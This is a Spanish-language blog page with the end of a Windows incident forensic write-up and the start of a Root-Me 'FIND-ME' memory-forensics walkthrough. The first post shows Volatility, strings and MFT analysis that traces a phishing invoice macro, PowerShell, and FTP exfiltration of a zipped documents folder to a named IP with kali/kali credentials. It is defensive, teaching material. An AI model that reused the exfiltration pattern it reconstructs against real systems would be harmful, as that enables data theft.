src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie4zC0R3RHlR2nPfoWMUWGO8CCPdSQdaFURs9AUM_68hbOxOy9TC3xE42pUHHlKnz3EbGEmrwaRGuwWNaWmbocKWvZFl5kokT-m3zXVt_8n0JMeDKTZjyHR0Jz0zpCV5G6N6UqeiyOqRrdwAEGoziUOTxw30fyvgZNU2pSZXGJAWaRVF9J47eVi0dI0YM/s16000/Imagen20.png" /></a></div>
<p class="MsoNormal"><br /></p><p class="MsoNormal" style="text-align: justify;">Tras haber analizado las conexiones y visto el árbol de
procesos, vamos a pasar a analizar proceso por proceso. Para ello haremos uso
del comando memdump que nos va a permitir volcar el área de memoria usada por
un proceso y a partir de ese volcado extraeremos datos utilizando strings en
Windows.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Para obtener el comando strings en Windows deberemos
descargarlo del siguiente enlace: <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/strings">https://docs.microsoft.com/en-us/sysinternals/downloads/strings</a><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Vamos a comenzar con el proceso WINWORD ya que nos interesa
saber cuál es el archivo que que ha podido generar esa ejecución de Powershell.
Para obtener el minidump del proceso 3304 ejecutamos el siguiente comando:<o:p></o:p></p>
<p class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">volatility.exe
-f RAUL-PC_20220607_152508_mem.dmp --profile=Win10x64_10586 memdum -p 3304 -D
.\dir<o:p></o:p></span></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR_zUZp0JNhfYFIG5Wc4mQccKa5tdxK90vh8KjSH7ZHHJMWiK6RD-AU0AkEok03aYBARjX6Mgz95WkaTK1YQkfA33d8pM5j-MXn7fG4s5TmzLKJjmcu2NXw5rs1D0CRc6CEhfL3PaUuGa-slLWi2_D8H7_Z-EShdlmfyCtCsvWniiY0AOj2D7mCl-SrH4/s567/Imagen21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="31" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR_zUZp0JNhfYFIG5Wc4mQccKa5tdxK90vh8KjSH7ZHHJMWiK6RD-AU0AkEok03aYBARjX6Mgz95WkaTK1YQkfA33d8pM5j-MXn7fG4s5TmzLKJjmcu2NXw5rs1D0CRc6CEhfL3PaUuGa-slLWi2_D8H7_Z-EShdlmfyCtCsvWniiY0AOj2D7mCl-SrH4/s16000/Imagen21.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Una vez obtenido el minidump, haremos uso de Strings y filtraremos por “doc” para poder ver qué documentos se encontraba manejando el Word en ese momento.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Después de realizar el comando strings64.exe 3304.dmp | find “doc” obtenemos registros de que el archivo que estaba abierto por el proceso es factura.doc que se encontraba en la ruta C:\Users\Raul\Desktop\factura.docx como se puede apreciar en la siguiente imagen.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghUc2_1WjiGOeqnl_zw97HZwO6Uh4x03YMKuABnO9aH5I97fg24FwFNr-IsTVnVDSGlLMYKQJMrALCKdkM3iPVEkLtsM6l_5-uCQ-I9JCD8-ZIGjm8BGUM7RpLOPmYn2UXZfJ3Mn74qoATdcELZuuUq0_PbG1SHmAEIMdY-6joVEvIduCVPkv9dws1prw/s567/Imagen22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghUc2_1WjiGOeqnl_zw97HZwO6Uh4x03YMKuABnO9aH5I97fg24FwFNr-IsTVnVDSGlLMYKQJMrALCKdkM3iPVEkLtsM6l_5-uCQ-I9JCD8-ZIGjm8BGUM7RpLOPmYn2UXZfJ3Mn74qoATdcELZuuUq0_PbG1SHmAEIMdY-6joVEvIduCVPkv9dws1prw/s16000/Imagen22.png" /></a></div><br /><br /><div style="text-align: justify;">El siguiente proceso que vamos a analizar es el proceso 360 correspondiente a Powershell, para ello volcamos el área de memoria del proceso:</div><br />volatility.exe -f RAUL-PC_20220607_152508_mem.dmp --profile=Win10x64_10586 memdum -p 360 -D .\dir<div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKb4jTX0OK10em6anIbFHPQCUwWhynX9pQATjTP7Jl1R7jETb1xNa2M58AFpY0eh6llsCnLLdKGou-onhM6Z7Hg2rG5wl4C8VJpOHeO2CTH-WXFqoi_IjKcvHhf8wQFsgaQ_SGNW6qnTfItvlkd2xolYKnNpoxDHcUSXqYJRfBrvaH95s6CkPE4Mzj5iw/s567/Imagen23.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="32" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKb4jTX0OK10em6anIbFHPQCUwWhynX9pQATjTP7Jl1R7jETb1xNa2M58AFpY0eh6llsCnLLdKGou-onhM6Z7Hg2rG5wl4C8VJpOHeO2CTH-WXFqoi_IjKcvHhf8wQFsgaQ_SGNW6qnTfItvlkd2xolYKnNpoxDHcUSXqYJRfBrvaH95s6CkPE4Mzj5iw/s16000/Imagen23.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Una vez obtenido el minidump vamos a tirar de Strings para intentar obtener información. Primero filtramos por “doc” y podemos observar que la persona que controlaba el proceso powershell comprimió la carpeta docs de Raúl en un fichero llamado exfil.zip, por lo que pudo haber robado información.</div><p class="MsoNormal"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk09Bp2C1Sg14S5QW6yOjAIKSX0WVC3TQd_gi-iIyEmFH2M-R43ks8pZN6o_0gY2l25CXiZi7y-doVVeCY-8pXef5rZnCKl8zZ5YuC7QCK4GN4_Ws5dFQR-7WUdfn0a9Yy7y1AY6t8YHejtRaeEt219x_K3g1coq76J5hae2zN8bx4Hh0JKc8zMMZYLLk/s567/Imagen24.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="349" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk09Bp2C1Sg14S5QW6yOjAIKSX0WVC3TQd_gi-iIyEmFH2M-R43ks8pZN6o_0gY2l25CXiZi7y-doVVeCY-8pXef5rZnCKl8zZ5YuC7QCK4GN4_Ws5dFQR-7WUdfn0a9Yy7y1AY6t8YHejtRaeEt219x_K3g1coq76J5hae2zN8bx4Hh0JKc8zMMZYLLk/s16000/Imagen24.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En el siguiente paso filtramos por “ftp” ya que si el atacante quiso robar información seguro que pudo haber utilizado el protocolo ftp tal y como vimos en el archivo LastActivityView.html y… bingo!, tal y como podemos ver en la imagen inferior el atacante ha extraído la información a través del protocolo FTP, además podemos ver cómo se conecta a la IP 151.12.4.11 la misma que vimos cuando extrajimos las conexiones de la memoria mediante el comando netscan con el usuario kali y la contraseña kali.</div><p class="MsoNormal"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvJjfP1l-OaXn8f_uRtLTYNdGkvRNOFDz5AGkt28D_FuqIRi7DruzWPbQ-iM3ksyRnErsrhLt0aD0YBO3yXRueNbwNx2qfRo6UlQP91Y5zNeTy1ebaDeozD6DPZCejf7r6rr0Ii0OXzVnVwTw7Xn8KvLKjVariGM8Iy0i00SPxsJwJtSN2t0PTsBeVf0/s567/Imagen25.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="220" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvJjfP1l-OaXn8f_uRtLTYNdGkvRNOFDz5AGkt28D_FuqIRi7DruzWPbQ-iM3ksyRnErsrhLt0aD0YBO3yXRueNbwNx2qfRo6UlQP91Y5zNeTy1ebaDeozD6DPZCejf7r6rr0Ii0OXzVnVwTw7Xn8KvLKjVariGM8Iy0i00SPxsJwJtSN2t0PTsBeVf0/s16000/Imagen25.png" /></a></div><p class="MsoNormal"><br /></p><p class="MsoNormal"><span><span style="font-size: large; font-weight: bold;">Análisis de evidencias. Registros de Ficheros: </span><br /></span></p><div style="text-align: justify;"><span><br /></span></div><div style="text-align: justify;">Únicamente nos queda descubrir cómo ha podido llegar ese archivo malicioso al PC de Raúl, por lo que volvemos al FTK imager y extraemos la MFT ($MFT) de la raíz del sistema de ficheros.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">La MFT o Master File Table, es una tabla que guarda los registros de todos los ficheros que están o han estado en el sistema junto con sus timestamps, es decir, las fechas de acceso, creación, modificación y cambios en los metadatos de los archivos.</div><p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs6YqowF7JEG5thzOVsighymtfviDt1YZfyKwYEDqjk5biO_xSPJDRZCaj9mgzO-Qqmk5CmS4JEBdx3iwtSO6c-ICFPa3FXyd-K4kW9Bx0-Wc5172KTTEG_THED6s_-5XBwXZXDb3y0_3-iil1wK_tAHGhH7hhw9d_yQpeWH4YQFyRMK8bxOnfS-qG0CU/s567/Imagen26.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs6YqowF7JEG5thzOVsighymtfviDt1YZfyKwYEDqjk5biO_xSPJDRZCaj9mgzO-Qqmk5CmS4JEBdx3iwtSO6c-ICFPa3FXyd-K4kW9Bx0-Wc5172KTTEG_THED6s_-5XBwXZXDb3y0_3-iil1wK_tAHGhH7hhw9d_yQpeWH4YQFyRMK8bxOnfS-qG0CU/s16000/Imagen26.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para poder leer la mft, primero debemos parsearla, es decir traducirla a un idioma que podamos interpretar, para ello vamos a hacer uso de la herramienta mftdump la cual es capaz de producir un archivo CSV con los registros de la MFT.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para descargar la herramienta se hacía desde la web <a href="http://malware-hunters.net/freetools/">http://malware-hunters.net/freetools/</a>, pero actualmente se encuentra caída por lo que podemos acceder mediante archive.org y descárgalo del siguiente enlace <a href="https://web.archive.org/web/20170223081622/http:/malware-hunters.net/wp-content/downloads/MFTDump_V.1.3.0.zip">https://web.archive.org/web/20170223081622/http://malware-hunters.net/wp-content/downloads/MFTDump_V.1.3.0.zip</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">La sintaxis es muy básica simplemente con mftdump.exe $MFT -o resultado.csv obtendremos la tabla MFT lista para analizarla con nuestra aplicación de hoja de cálculo preferida.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZTJNUJY5cWrEtBXGLWQjetxbPpAQOdSFnefi6QqmkVAQ64ZzYurdxcKU9-FEl2idzptrh92UXglvwGa_VEBb5U_ey34Mgh2x22PXfcHFcv2RYcq112E7xAvIgXHWlAV_Al1T0Pwm699KMDx1uNuAWyFAa0I4SthRT83_mHJxpvQvQmIrcrGlrCvjkktY/s567/Imagen27.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="83" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZTJNUJY5cWrEtBXGLWQjetxbPpAQOdSFnefi6QqmkVAQ64ZzYurdxcKU9-FEl2idzptrh92UXglvwGa_VEBb5U_ey34Mgh2x22PXfcHFcv2RYcq112E7xAvIgXHWlAV_Al1T0Pwm699KMDx1uNuAWyFAa0I4SthRT83_mHJxpvQvQmIrcrGlrCvjkktY/s16000/Imagen27.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En este caso yo he utilizado Excel y tras pasar los registros a columnas separados por tabulador, ordenarlos de más antiguos a más nuevos y filtrar por “factura” hemos encontrado un registro .lnk en los recents que justamente se encuentra debajo de bastantes registros de Thunderbird, lo que hace pensar que el cliente de correo electrónico ha podido tener algo que ver en la aparición de este archivo.</div><p class="MsoNormal"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheuhemSJdkDXhWwtAGXMd8QcIjWLn77KpipuJI9695NMngSgmDwO-5qpLzKVTCsiDNRgOS3rhD1H1W5GBs7pK7GZ6ioFibRu6M2khPpKB5d3I6Ml_D_CkbI7p4t8idLl79woQC9doFLFjiMcFnb9Es-Umgh-sful-8rc-BLNYOZ1k80iEL-j5201KHw4Y/s567/Imagen28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="56" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheuhemSJdkDXhWwtAGXMd8QcIjWLn77KpipuJI9695NMngSgmDwO-5qpLzKVTCsiDNRgOS3rhD1H1W5GBs7pK7GZ6ioFibRu6M2khPpKB5d3I6Ml_D_CkbI7p4t8idLl79woQC9doFLFjiMcFnb9Es-Umgh-sful-8rc-BLNYOZ1k80iEL-j5201KHw4Y/s16000/Imagen28.png" /></a></div><p class="MsoNormal" style="text-align: justify;">Decididos a analizar el correo electrónico de Raúl mediante
FTK imager nos dirigimos a la ruta
C:\Users\Raul\AppData\Roaming\Thunderbird\Profiles y nos exportamos su perfil
de correo electrónico para poder analizarlo.</p><p class="MsoNormal"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ7bUssYCVjGP0wLnfrJ3PxGfXcfV9B9xhUXiFBgU0fP06ScX35lrEHSUpX5L-6-xa6d3gSRFhlc1gq7I86IssR1HR5VfpWF8KButbwm9BJhgODctyStibg3MZiOVZR_O-Ksu8ZYzDxxF_qAesQkTLEsdf2hiaN39nh4HfxADauL0F-h0LjD5BOoGngY/s567/Imagen29.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="236" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ7bUssYCVjGP0wLnfrJ3PxGfXcfV9B9xhUXiFBgU0fP06ScX35lrEHSUpX5L-6-xa6d3gSRFhlc1gq7I86IssR1HR5VfpWF8KButbwm9BJhgODctyStibg3MZiOVZR_O-Ksu8ZYzDxxF_qAesQkTLEsdf2hiaN39nh4HfxADauL0F-h0LjD5BOoGngY/s16000/Imagen29.png" /></a></div><p class="MsoNormal" style="text-align: justify;">El correo electrónico procedente del cliente Thunderbird lo
analizamos con la herramienta Mbox Viewer Free <a href="https://www.mboxviewer.com/">https://www.mboxviewer.com/</a>. Esta es una
herramienta cuya licencia tiene un coste, pero que permite un periodo de prueba
de aproximadamente unos 15 días.</p><p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Abrimos la herramienta y cargamos la carpeta exportada con
el perfil tal y como se puede ver a continuación.<o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTxE5KyzOPPjXpRMQx2DmL_SWLBk1P3OATaqCFjNqnBfqpGQ8wGNF3ze8eCmxrSDE92ZUigPwD5Ra1LV9Hav1q9a0PtLDqvc-wBFvqdLSMqMwd1G1GK7qQGeZ5Pn5cAb9dBv0GrzCCGYFaszpmfOI40qTQC9J7hNOLpoZPelvLr1HYcJjaXFjWvCPmKhg/s361/Imagen30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTxE5KyzOPPjXpRMQx2DmL_SWLBk1P3OATaqCFjNqnBfqpGQ8wGNF3ze8eCmxrSDE92ZUigPwD5Ra1LV9Hav1q9a0PtLDqvc-wBFvqdLSMqMwd1G1GK7qQGeZ5Pn5cAb9dBv0GrzCCGYFaszpmfOI40qTQC9J7hNOLpoZPelvLr1HYcJjaXFjWvCPmKhg/s16000/Imagen30.png" /></a></div><p class="MsoNormal">Y vualá, ahí tenemos el correo electrónico de Raúl.</p><p class="MsoNormal"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMSvaBAp3Qr5JXS0znUUKj_5FCHfSlqhyphenhyphenEP5lC_QNDCKQtdKGBRaERnroLq5AQA8RcIurS-P10waG8Q-Yy353jCScOIKadDXVlwt_RAnjKN4Wjkg-jP6C4PbJ8oc0FIZ-hvCI0p5OGe6Q9m8TN23LgY-gLC5AjncZgZgc6VcS6gUqW7ixf1hZTnSQUpRE/s567/Imagen31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="79" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMSvaBAp3Qr5JXS0znUUKj_5FCHfSlqhyphenhyphenEP5lC_QNDCKQtdKGBRaERnroLq5AQA8RcIurS-P10waG8Q-Yy353jCScOIKadDXVlwt_RAnjKN4Wjkg-jP6C4PbJ8oc0FIZ-hvCI0p5OGe6Q9m8TN23LgY-gLC5AjncZgZgc6VcS6gUqW7ixf1hZTnSQUpRE/s16000/Imagen31.png" /></a></div><p class="MsoNormal" style="text-align: justify;">Si nos fijamos detenidamente
Raúl suele recibir correos de la empresa cliente aliven.es, pero… en su buzón
de entrada hay un correo desde el dominio a1iven.es, lo que parece claramente
una suplantación de identidad.</p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;">Si abrimos el correo podemos
observar que tiene como adjunto el archivo factura.doc.</span><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsFQ1-vEKBfoGRhrvj0rCfKwCo1vbaUWafTwH3Mnsgejh-WV-vcoQHE6_yuZ2UHYGG-543ief_cvdutvTSsX6AwW9Y3JrhaIjQREcIcvCzudsnAwF8w4R5C7oiCfOXloouTcTAnJWy0mHb5rvULl-kFoJ8w4uEi-Feuw6Yq5k3WFBI2Y62LOl2ypDUlA/s567/Imagen32.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="168" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsFQ1-vEKBfoGRhrvj0rCfKwCo1vbaUWafTwH3Mnsgejh-WV-vcoQHE6_yuZ2UHYGG-543ief_cvdutvTSsX6AwW9Y3JrhaIjQREcIcvCzudsnAwF8w4R5C7oiCfOXloouTcTAnJWy0mHb5rvULl-kFoJ8w4uEi-Feuw6Yq5k3WFBI2Y62LOl2ypDUlA/s16000/Imagen32.png" /></a></div><p class="MsoNormal"><o:p> </o:p><span style="text-align: justify;"><br /></span></p><p class="MsoNormal"><span style="text-align: justify;">Tras comprobar el correo nos
dirigimos con FTK imager a la ruta C:\Users\Raul\Desktop\factura.doc y
extraemos el archivo.</span></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwNyM1kuAZNtN6YuJuanG9hBonh7gX-cGH4yyVmEDsGo2bgpZuym_pqNMrhbbYley7FQVH3Vgtt9jl5EGEuuiDBA3xl2QBg00og0rv5xlfjwyGoBBE1LeE5xH6ti5QIKCTUqMBvjgjV5feISEw3cHbUMyU0eq6COaG8t4s6Q-Duv7UpKm0nzvtdxjQzA/s567/Imagen33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="120" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwNyM1kuAZNtN6YuJuanG9hBonh7gX-cGH4yyVmEDsGo2bgpZuym_pqNMrhbbYley7FQVH3Vgtt9jl5EGEuuiDBA3xl2QBg00og0rv5xlfjwyGoBBE1LeE5xH6ti5QIKCTUqMBvjgjV5feISEw3cHbUMyU0eq6COaG8t4s6Q-Duv7UpKm0nzvtdxjQzA/s16000/Imagen33.png" /></a></div><p class="MsoNormal"><span style="text-align: justify;">Una vez obtenido el archivo podemos analizarlo de varias
formas. Una de ellas es subirlo a virustotal y obtendremos un análisis del
archivo, tal y como podemos ver en la imagen inferior:</span></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7mYF5RVSmcnZRgheNXWWO4_Spguu5Lr8WxW15tcMpB2aJwacYLTh3ptOZ3e02DOM7BkC3_6Qi1H0SG_ThaCj1InQFKxaN9aNeVLZ-hueIqPd8miG4ePPzr5qGm2Z6RvkNcb3tot4kyuaxD7WTvz_amFyXP8tXrfLu6haSb1hKOjif4qr29BfQYuU3EM/s567/Imagen34.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7mYF5RVSmcnZRgheNXWWO4_Spguu5Lr8WxW15tcMpB2aJwacYLTh3ptOZ3e02DOM7BkC3_6Qi1H0SG_ThaCj1InQFKxaN9aNeVLZ-hueIqPd8miG4ePPzr5qGm2Z6RvkNcb3tot4kyuaxD7WTvz_amFyXP8tXrfLu6haSb1hKOjif4qr29BfQYuU3EM/s16000/Imagen34.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">O con mucho cuidado y en un entorno controlado, podemos proceder a abrirlo y comprobar que el fichero tiene una macro en su interior con el comando que vimos en los eventos de powershell.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04t_QPSQoBFoait_7dbMfMUWHR10Sg0Nl3fWsbxwYXTRCH_msIaOoHZ8CxSR00gLhq_7iRJl-HDKQkJ19EtPAbmgVZD-AEEaAff5IhfXr24u2s6Pf63l6FhhJR6iBW-A9Z3q_aY3Myftsd83-ZPRah22Ngn9OdgdiiMUpzsgOY9Rm_CQx5K9l5Is1h94/s567/Imagen35.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="294" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04t_QPSQoBFoait_7dbMfMUWHR10Sg0Nl3fWsbxwYXTRCH_msIaOoHZ8CxSR00gLhq_7iRJl-HDKQkJ19EtPAbmgVZD-AEEaAff5IhfXr24u2s6Pf63l6FhhJR6iBW-A9Z3q_aY3Myftsd83-ZPRah22Ngn9OdgdiiMUpzsgOY9Rm_CQx5K9l5Is1h94/s16000/Imagen35.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Fin.</div></div>Dormiderahttp://www.blogger.com/profile/16655224085496865622noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-89125072625389140472022-06-13T13:18:00.007+02:002022-06-14T09:32:27.628+02:00FIND-ME Root-Me Walkthrough<p><span style="text-align: justify;">Últimamente le estoy pegando
mucho a los retos forenses, ya que definitivamente creo que es con lo que más
disfruto en el área de seguridad, y concretamente en una plataforma gratuita
llamada Root-Me </span><a href="https://www.root-me.org/" style="text-align: justify;">https://www.root-me.org/</a></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Hoy os traigo la resolución del
reto FIND-ME, de dificultad media/alta por el que nos darán 50 puntos si lo
resolvemos: <a href="https://www.root-me.org/en/Challenges/Forensic/Find-me">https://www.root-me.org/en/Challenges/Forensic/Find-me</a>
<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;">Ojo comienza el spoiler.</p><p class="MsoNormal" style="text-align: justify;"><b><span lang="EN-US">Autor:</span></b><span lang="EN-US"> David Bernal<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US">Twitter: @db3rn4l.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;">
</p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US">Linkedin: </span><a href="https://www.linkedin.com/in/davidbernal89/"><span lang="EN-US">https://www.linkedin.com/in/davidbernal89/</span></a><span lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><b><span style="font-size: 14pt; line-height: 107%;">Premisas:<o:p></o:p></span></b></p>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3EJaRsxWM6XKJwjfFo9TsouC6WXeNt8YJtbkQv8j0cwCN6k0FtPguiob5jAx_Fit4IUjpyXuvzYjsGVdGg6oP5PJrjEcmzNDhde4IUI805aWekzSSZdYxtH7zPJ-EkP63SpHdmnR75Z0OKlCpKMAuHAX9ALC580AN9pMtCgStlh93XH9XLv4dm13J4w" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="304" data-original-width="910" height="214" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3EJaRsxWM6XKJwjfFo9TsouC6WXeNt8YJtbkQv8j0cwCN6k0FtPguiob5jAx_Fit4IUjpyXuvzYjsGVdGg6oP5PJrjEcmzNDhde4IUI805aWekzSSZdYxtH7zPJ-EkP63SpHdmnR75Z0OKlCpKMAuHAX9ALC580AN9pMtCgStlh93XH9XLv4dm13J4w=w640-h214" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-family: arial; font-size: x-small;">Maquina Find Me</span></td></tr></tbody></table><br /><p class="MsoNormal" style="text-align: justify;">El reto indica que tu hijo (no
reconocido, entiendo…) es un geek que quiere demostrarte que tiene habilidades
para ocultarte información. Un buen día te dejaste la sesión abierta y éste
pillo aprovechó para gastarte una broma.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Vaya, que lo que debemos hacer es
encontrar la contraseña de validación de algo en lo que parece ser un volcado
de memoria.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Durante este reto voy a utilizar
Caine y Windows10 con varias herramientas forenses para resolverlo,
principalmente volatility 2.6 en Caine y Volatility Standalone en Windows.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Pulsamos en el botón start hte
challenge y se nos descargará un archivo de nombre ch18.zip el cual, en su
interior, contiene el volcado de memoria. <o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><b><span style="font-size: 14pt; line-height: 107%;">Análisis de memoria <o:p></o:p></span></b></p>
<p class="MsoNormal" style="text-align: justify;">Realizamos un imageinfo para
obtener el perfil sugerido para trabajar con volatility: vol.py -f dump
imageinfo.<o:p></o:p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiSsxUK4wRM3FCKM7mpymdEDGgFpQ1Hc8j_owSAEs9uIf98hbrIcWseTVKKHVGb05yP_UCNfuautgapzKKHQ6K0NV5un2bn7-PaK1UihB5rC3huENSaBJhK1lgQMnZKDkwfK4GbcNV1Ej7dra8Nfa0ry2oyPA5rOUcUNjYutTqco0b7DuX3K0GJNHGqmQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="315" data-original-width="921" height="218" src="https://blogger.googleusercontent.com/img/a/AVvXsEiSsxUK4wRM3FCKM7mpymdEDGgFpQ1Hc8j_owSAEs9uIf98hbrIcWseTVKKHVGb05yP_UCNfuautgapzKKHQ6K0NV5un2bn7-PaK1UihB5rC3huENSaBJhK1lgQMnZKDkwfK4GbcNV1Ej7dra8Nfa0ry2oyPA5rOUcUNjYutTqco0b7DuX3K0GJNHGqmQ=w640-h218" width="640" /></a></div><p class="MsoNormal" style="text-align: justify;">Una vez obtenido el perfil,
podemos comenzar a analizar la memoria. Yo, cuando no tengo ninguna pista más
allá, me gusta empezar echando un primer vistazo a los procesos por si acaso
hay algo que me salte a la vista. Lanzamos un pstree porque me gusta tener una
lista, no solo de los procesos en ejecución, si no de las relaciones que puede
haber entre ellos (por aquello de que puede aparecer un chrome.exe lanzando un
powershell… por ejemplo).<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Para sacar el árbol de procesos
ejecutamos el comando:<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py -f dump --profile=Win7SP1x86_23418
pstree > pstree.txt<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><!--[if gte vml 1]><v:rect id="Rectangle_x0020_4"
o:spid="_x0000_s1028" style='position:absolute;left:0;text-align:left;
margin-left:-.05pt;margin-top:290.3pt;width:418.65pt;height:8pt;z-index:251659264;
visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;
mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
mso-position-vertical-relative:text;v-text-anchor:middle' o:gfxdata="UEsDBBQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbKSRvU7DMBSF
dyTewfKKEqcMCKEmHfgZgaE8wMW+SSwc27JvS/v23KTJgkoXFsu+P+c7Ol5vDoMTe0zZBl/LVVlJ
